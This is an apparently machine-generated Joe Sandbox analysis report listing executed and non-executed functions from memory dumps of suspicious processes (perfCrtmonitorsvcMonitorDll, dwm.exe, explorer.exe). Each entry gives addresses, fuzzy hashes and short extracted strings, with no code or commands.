Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction ID: 042031581395d8e5543300c797d7b11ddd806779e6274e757593acafbbd406eb
Opcode Fuzzy Hash: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction Fuzzy Hash: 13E0B634E8A40B8AE720AB58C8846BE7376FB51391F109635D43AA6286DE3CA545CB80

Function 00007FF887B0114D Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction ID: 6b2194c5e39236f5f98b33840fc03effd42491b2101b7c4b1410035b32ba5d1f
Opcode Fuzzy Hash: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction Fuzzy Hash: 28E0B630A4451ECFDB18EA90C8949AE73B2FB94390F000A29D426E7291DBB86504CA40

Function 00007FF887B00BF5 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction ID: fae8763b34595996f8a2c6093be29d0ae0c0dc5c25eb247c4ff108361e0ab167
Opcode Fuzzy Hash: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction Fuzzy Hash: E2E01230D49406CBE720DB44C8446BE7371FB50351F008225C426A7285DA3CA545CF80

Function 00007FF887B0141A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dfce4c7730f544fa699636493a1cf7dad10c4bf1644418f235bcf24c9663797
Instruction ID: 98dbe2204a08a9d45cd5b1f9c8c8e963c7f30e13fb62e9138ac8d4c5165941d1
Opcode Fuzzy Hash: 5dfce4c7730f544fa699636493a1cf7dad10c4bf1644418f235bcf24c9663797
Instruction Fuzzy Hash: 60D09270A58A2DDEEB94DB68C448BADB6F0BF09340F0001A9D01CE2180DB7815888F42

Non-executed Functions

Function 00007FF887B01980 Relevance: 7.8, Strings: 6, Instructions: 252COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B01B4F
r6y, xrefs: 00007FF887B01B09
r6y, xrefs: 00007FF887B01B2C
"9y, xrefs: 00007FF887B01A92
r6y, xrefs: 00007FF887B01AE6
b4y, xrefs: 00007FF887B01BAB

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID: "9y$b4y$r6y$r6y$r6y$r6y
API String ID: 0-2811459466
Opcode ID: 5591831544c3e17861e2dc067140b154adac23fe9dfcb18ee918293979ef3b4f
Instruction ID: 010c0a08d3e779d91895407a554aa6682877e042f24ae237e87a79854586165d
Opcode Fuzzy Hash: 5591831544c3e17861e2dc067140b154adac23fe9dfcb18ee918293979ef3b4f
Instruction Fuzzy Hash: 2E91BD31D0CA8D8FEB59EB68D8957AC7BF1FF9A350F40017AD00ED7286DA682855C741

Function 00007FF887B019FD Relevance: 7.7, Strings: 6, Instructions: 238COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B01B4F
r6y, xrefs: 00007FF887B01B09
r6y, xrefs: 00007FF887B01B2C
"9y, xrefs: 00007FF887B01A92
r6y, xrefs: 00007FF887B01AE6
b4y, xrefs: 00007FF887B01BAB

Memory Dump Source

Source File: 00000005.00000002.1440280443.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887b00000_perfCrtmonitorsvcMonitorDll.jbxd

Similarity

API ID:
String ID: "9y$b4y$r6y$r6y$r6y$r6y
API String ID: 0-2811459466
Opcode ID: da9e93b8133e6430f93abfdb4a277e2c35f0e804a2e270ea74e647e517121baa
Instruction ID: 293f92f36053a4b33d9ff3b62979c5f2b82ead4330cb16c6ebb6e235c358c3ee
Opcode Fuzzy Hash: da9e93b8133e6430f93abfdb4a277e2c35f0e804a2e270ea74e647e517121baa
Instruction Fuzzy Hash: 0F819B30D08A8D8FEB99EB68C8947AD7BF1FF9A360F40017AD00ED7296DB281855C741

Analysis Process: dwm.exePID: 8040, Parent PID: 1124COMMON

Executed Functions

Function 00007FF887B1E9B0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43001c2796c035433f1a8124e2661ae281768c728519d481a7a0db6410c25f0
Instruction ID: 650f7c0519306991a8d5c6287e424f9ae29d7377a1c71fcc040a70c36492b9b5
Opcode Fuzzy Hash: b43001c2796c035433f1a8124e2661ae281768c728519d481a7a0db6410c25f0
Instruction Fuzzy Hash: BD510871D58A5D8FEF94EBA8D895BADBBF2FB68341F10016AD00DE3251DA34A841CB50

Function 00007FF887B11519 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cdc4390c41e55f6cc2cffc7995f57aa63b94efe0fd653fe4d3fadb00ac4f943
Instruction ID: 32a1711052d8a3d1febcc25459daa565a7f1de74162ca27e65f33e633b9a774f
Opcode Fuzzy Hash: 1cdc4390c41e55f6cc2cffc7995f57aa63b94efe0fd653fe4d3fadb00ac4f943
Instruction Fuzzy Hash: D4416570D9960D8FEB84EF98D4546FDBBB2FF59340F14017AD00AE7292CA396844CB60

Function 00007FF887B10510 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3ce3c43dc48f019d69929186d1e755894fc4dbd29b0a773cc9b78f2ab572cd5
Instruction ID: dec7f3cd5bee87b9334e5fa53008c301abfe58c221b218b91c8a5cd9b4791e73
Opcode Fuzzy Hash: e3ce3c43dc48f019d69929186d1e755894fc4dbd29b0a773cc9b78f2ab572cd5
Instruction Fuzzy Hash: 1131E52290D15696EB5177E8E4D12ED7BA0EF433B5F084973F0ACC9083DD6C6886829A

Function 00007FF887B11085 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1c7f1b499397b21d15da6e51670021a4e99cafd71241a4c9143de25a4720df8
Instruction ID: 090cef8f5bec5549f5e0c011d3fddad7c0a944047e646704579ca6fb1a94981e
Opcode Fuzzy Hash: e1c7f1b499397b21d15da6e51670021a4e99cafd71241a4c9143de25a4720df8
Instruction Fuzzy Hash: 8011DC36A8C59ECBDB21AA58EC542EE37B1FB85360F0402BBC404D7195DB6C2529C6D1

Function 00007FF887B10E40 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3c930e6960f637bd88edb7baf963ed14e22e8912f68d43faaabd8b83914837a
Instruction ID: e3449fe809b92a5a1c6a691083f30593330ef2649756401117bd6d67355b1dbe
Opcode Fuzzy Hash: d3c930e6960f637bd88edb7baf963ed14e22e8912f68d43faaabd8b83914837a
Instruction Fuzzy Hash: 3621A275D4D28E8FE7029B60C8042FE7BB2FF16345F144176C025D61D6DA3C5509CBA1

Function 00007FF887B10580 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64e8443c6ddcae4955edd07ece8a02d1bd1fd0ae584038d17211fe3bdb0eee3e
Instruction ID: 9f5fe90a1f4c711ea614aeecdd8830836e17413e8e6946edf4654df6e026bf81
Opcode Fuzzy Hash: 64e8443c6ddcae4955edd07ece8a02d1bd1fd0ae584038d17211fe3bdb0eee3e
Instruction Fuzzy Hash: C6110A3190D19A8ADB41BBA8E4D52ED7BB0FF43374F080976F05CC5083DE686895C396

Function 00007FF887B10FC5 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae71e2bc8b0b8dbe624d9e18f0c58d662e48c83fc947dea32fe4f7261ca361b0
Instruction ID: ff5b8cb57e8baafa1a5113977d3293aff1c47656bb57dd2a6980f2a2f017080b
Opcode Fuzzy Hash: ae71e2bc8b0b8dbe624d9e18f0c58d662e48c83fc947dea32fe4f7261ca361b0
Instruction Fuzzy Hash: 2911E1319182898BCB41EF78D8456ED3BB4FF09344F0409BAE888D3156DB38B568CB85

Function 00007FF887B10DC9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d0b9769430b0420927539ceca577c1eeabc96f854cedda22eecf02a004f2821
Instruction ID: 3a8e4d460995dee444f9e0e28b468d8936809192b46be188469de301a356d51e
Opcode Fuzzy Hash: 3d0b9769430b0420927539ceca577c1eeabc96f854cedda22eecf02a004f2821
Instruction Fuzzy Hash: 0E115871D4D24E8FEB119BA1C8082BE7BB2FF49340F14857AC025D62D6DA3C6644CBA1

Function 00007FF887B116F4 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c65736fcd7128cbad9a4eebc47adf34f36f5888390e7f20959c3aa727e07223b
Instruction ID: 51b7f3bc408d4f3c073005981121e349f1b421ff23d67420450f2d948e5ab2b8
Opcode Fuzzy Hash: c65736fcd7128cbad9a4eebc47adf34f36f5888390e7f20959c3aa727e07223b
Instruction Fuzzy Hash: 7411873088E3C94FD7439BB08868AD87FB4EF47210F1904EBD488CB0A3C66D594AC722

Function 00007FF887B114A0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56baf68264e9c84a01d0e5d0770066e13635cc11a33692293819a1fe8268c0a4
Instruction ID: 7f6ffa2078dff0b42003c73cfd4b34f057cd73f0172681bde4af9bf4f77fbfd7
Opcode Fuzzy Hash: 56baf68264e9c84a01d0e5d0770066e13635cc11a33692293819a1fe8268c0a4
Instruction Fuzzy Hash: C9012C3148E3C98FC7179BB488612A57FB5BF07244F0A44EBD495CB4E3D62C6869CB62

Function 00007FF887B105A0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 830039eb218fa40682305492f0cd21dd28e9f6c0d9c77a21498049eaf02f30ab
Instruction ID: aa511cbc735afa358ace8479ac143f544bfee469b0c91b2c0f29fa8ca81075b5
Opcode Fuzzy Hash: 830039eb218fa40682305492f0cd21dd28e9f6c0d9c77a21498049eaf02f30ab
Instruction Fuzzy Hash: A701243184D28A8AEB40BFA8D4842FD7BB0BF02374F04097AF41CC1083CE78A890C346

Function 00007FF887B10A79 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86d39cbda19be1bba569f1225ff04882c35cbdd936c7057b50609093bf470965
Instruction ID: 8a7a145c6a1105767be20c01e800b0d6299b0ed1fe876de535a24333b6d7c447
Opcode Fuzzy Hash: 86d39cbda19be1bba569f1225ff04882c35cbdd936c7057b50609093bf470965
Instruction Fuzzy Hash: 6A01A23189D7C98FE756AB6488682FD7FF0FF56340F4900BAD499C60D3DA285858C721

Function 00007FF887B18258 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e113d6d11d1127d42fdd5085db5c0b6ff37df4a18eeac54ea59665e5fc77df39
Instruction ID: ceecfe941d909a9e5d83bae2f63a8bfc0924fa9bac576b4fe6addeb5fe6e6ac4
Opcode Fuzzy Hash: e113d6d11d1127d42fdd5085db5c0b6ff37df4a18eeac54ea59665e5fc77df39
Instruction Fuzzy Hash: BDF01730D58A8E9EEB90EFA898486FD77F5FF28300F510576E81DD2190DB34A150CB90

Function 00007FF887B105D8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7aeb2e831646f4fe1d6c0094af6caa4b43f5804ece3f849b2c30d6ca6f8766e
Instruction ID: e8c4d19596c1e70dc4739a7f25cb804afcee998c6c5dd96b8321f972eb9759d4
Opcode Fuzzy Hash: b7aeb2e831646f4fe1d6c0094af6caa4b43f5804ece3f849b2c30d6ca6f8766e
Instruction Fuzzy Hash: FDF0E730918A8D8FEB90EF68D8496EE7BF1FF28345F500566E819D2190DA34A194CB81

Function 00007FF887B10A90 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 546efc2c08a2a36429d13e082531821a8024f8a6c4600ffc7d925cb02a7b2cc7
Instruction ID: 48474a8b1dfbf00396fd827bf9c2e1a96d963294ee48624602779604a1ea09c8
Opcode Fuzzy Hash: 546efc2c08a2a36429d13e082531821a8024f8a6c4600ffc7d925cb02a7b2cc7
Instruction Fuzzy Hash: 2FF0E930CAC68DDAEB54EB7494582FD7BF0FF19344F440076D45DC20C1DA346594C661

Function 00007FF887B119A5 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02a12993846123ed7b736cff01815751f23f0789dd4856ab23e59bea199061ee
Instruction ID: 1d517529ceb31345dbfe7ea372d72b5d2f274e6b4e89ee6d9aeefb3525096ddb
Opcode Fuzzy Hash: 02a12993846123ed7b736cff01815751f23f0789dd4856ab23e59bea199061ee
Instruction Fuzzy Hash: 76F0907099864D8FDB04EF68C8496ED7BF1FF44340F4401BAD818C3181DB749161C740

Function 00007FF887B105D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f4dcf969d917706fc56aaabee790832890412d8c80f983c74cd3c5a7f08ab4c
Instruction ID: d3f0a46153c66955ba8e3930f6cc7d8e02733bdf438ef6a83ec1b18ef9cb0d18
Opcode Fuzzy Hash: 9f4dcf969d917706fc56aaabee790832890412d8c80f983c74cd3c5a7f08ab4c
Instruction Fuzzy Hash: 2CF039308A8A4D9EEB40EF6498886FE77B4FF18350F40057AE81CC2190DA74A5A0CB51

Function 00007FF887B18328 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baddb8c64112ed181be72d6a52945c018e9a49c26f1e396d3fbeef24f2702c0c
Instruction ID: 2403ee7b0726365953cee22859d953819f53566d5dacee3ab15379f675f979aa
Opcode Fuzzy Hash: baddb8c64112ed181be72d6a52945c018e9a49c26f1e396d3fbeef24f2702c0c
Instruction Fuzzy Hash: 97F039308A858D9FEB50EFA498486FD77B4FF19340F4104B6E81DC2190DA38A1A0CB41

Function 00007FF887B11250 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba63c8834bccfc240ecb72307ca063d15481292f7217a39fc085560aa1cca1bd
Instruction ID: 886c6376c04ad545925b85be30056381f7cf47beab21bdba5bda79e73227ef70
Opcode Fuzzy Hash: ba63c8834bccfc240ecb72307ca063d15481292f7217a39fc085560aa1cca1bd
Instruction Fuzzy Hash: C2F0393199810ECBEB54EA40D8909FE73B6BF95380F100279D01AD2296DE786904CAA0

Function 00007FF887B10C36 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction ID: 3ae4450825d88ecef7882539c3b9be0faa593e5c370ee2d9cbe397e0fed440bf
Opcode Fuzzy Hash: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction Fuzzy Hash: 48E01234DCE5078AE710AB1488945FF7376FF51391F105931E43AC218ADD3C6145CEA0

Function 00007FF887B10C04 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction ID: 662f5893428c6a8c2b0fc4cc33ff4ff0562454e6a488f81f6694a2ff83d5ffe8
Opcode Fuzzy Hash: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction Fuzzy Hash: 62E0BF34D8950B8AE710AB54C8446BE7376FB51351F105635D435C6285DE3C6545CF90

Function 00007FF887B1114D Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction ID: c602414b45de28963ac86aa61eca2f2777105b65ef7f8deb6ec32c5f96159b89
Opcode Fuzzy Hash: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction Fuzzy Hash: 2BE0EC31A4451ECFDB14EF40C8949FE73B2FB95390F000A79D426D7295DBB86504CB90

Function 00007FF887B10BF5 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction ID: 68713903ec9445f1b9161091e1b627fb26878a00bca52931f1a42d361785b16b
Opcode Fuzzy Hash: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction Fuzzy Hash: 66E01234D4950ACBE710EB44C8446BE7371FB50351F108226D426C7289DA3CA545CF90

Function 00007FF887B1141A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0d217b6c1f838dbcf64b8df007a48bbab95310f3e496df76d1fc00d07e02c5
Instruction ID: 2f2b535a0e9aa9197c253c08db03789c8486a68f18bd50dca516e6e2688266f0
Opcode Fuzzy Hash: 5e0d217b6c1f838dbcf64b8df007a48bbab95310f3e496df76d1fc00d07e02c5
Instruction Fuzzy Hash: CBD0927095862E9EEB90DB58C448BBDB6F0BF0A345F0041A5D01CD2181DB7815C48B52

Function 00007FF887B1147E Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3bfdd0e236329f2dc260553f4b612bea235462995b01530acd1fbb714c54e41
Instruction ID: b0e72d3b5b8e03cd8fe9da6d7fc2d966367d06183e4d9f8e15cc85aaa06289b3
Opcode Fuzzy Hash: c3bfdd0e236329f2dc260553f4b612bea235462995b01530acd1fbb714c54e41
Instruction Fuzzy Hash: A2B09230C5801A8AE7809A40D8906BD7272BF41380F100135E419E2181CB782900C790

Non-executed Functions

Function 00007FF887B11980 Relevance: 7.8, Strings: 6, Instructions: 253COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B11AE6
b4y, xrefs: 00007FF887B11BAB
r6y, xrefs: 00007FF887B11B4F
r6y, xrefs: 00007FF887B11B2C
"9y, xrefs: 00007FF887B11A92
r6y, xrefs: 00007FF887B11B09

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID: "9y$b4y$r6y$r6y$r6y$r6y
API String ID: 0-2811459466
Opcode ID: 06e687cc4e6af7a94c45b409368406c5907f70ec2bc4189fd3415cc3f5a63a8f
Instruction ID: 1b0a71524026a08a1a063ff9f711d803894a3026609191aa7723f7d454d91170
Opcode Fuzzy Hash: 06e687cc4e6af7a94c45b409368406c5907f70ec2bc4189fd3415cc3f5a63a8f
Instruction Fuzzy Hash: 91919831D18A8D8FEB89DB68D8957ADBBF1FF9A350F50017AC00DC72C2DA682819C751

Function 00007FF887B119FD Relevance: 7.7, Strings: 6, Instructions: 239COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B11AE6
b4y, xrefs: 00007FF887B11BAB
r6y, xrefs: 00007FF887B11B4F
r6y, xrefs: 00007FF887B11B2C
"9y, xrefs: 00007FF887B11A92
r6y, xrefs: 00007FF887B11B09

Memory Dump Source

Source File: 0000000F.00000002.1519420892.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID: "9y$b4y$r6y$r6y$r6y$r6y
API String ID: 0-2811459466
Opcode ID: 74a5c1acd08d883e6c76020bf929a7deb7177142c700e8d2fb1535edb81dc489
Instruction ID: a02e004c13917c7b093b8cf576cc8caec3f28840c22f8a70d30cb86bf927b63e
Opcode Fuzzy Hash: 74a5c1acd08d883e6c76020bf929a7deb7177142c700e8d2fb1535edb81dc489
Instruction Fuzzy Hash: 88819931D18A8D8FEB89DB68D8957ADBBF1FF9A350F50017AC00DD72C2DA282815C751

Analysis Process: explorer.exePID: 8052, Parent PID: 1124COMMON

Executed Functions

Function 00007FF887B13704 Relevance: 6.9, Strings: 5, Instructions: 635COMMON

Download Yara Rule

Strings

", xrefs: 00007FF887B13944
", xrefs: 00007FF887B14254
6y, xrefs: 00007FF887B14171
6y, xrefs: 00007FF887B13D16
!, xrefs: 00007FF887B133C7

Memory Dump Source

Source File: 00000010.00000002.1519228172.00007FF887B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887b0d000_explorer.jbxd

Similarity

API ID:
String ID: 6y$6y$!$"$"
API String ID: 0-3575809988
Opcode ID: b8406c8e351ba8c2c76e71c2ddeb6c05374c9d2e05d0b7805c42dbfc94ee9659
Instruction ID: 22a15bd3a89c6b75944d8a3b0af75db0708b9837a8eb069b786a30c2923408d4
Opcode Fuzzy Hash: b8406c8e351ba8c2c76e71c2ddeb6c05374c9d2e05d0b7805c42dbfc94ee9659
Instruction Fuzzy Hash: 4542A570D5852D8FDBA8EB58C898BADB7B2FF59344F1041E9D00DE7291DA34AA81CF50

Function 00007FF887B194C2 Relevance: 4.1, Strings: 3, Instructions: 325COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B19822
r6y, xrefs: 00007FF887B19573
r6y, xrefs: 00007FF887B19523

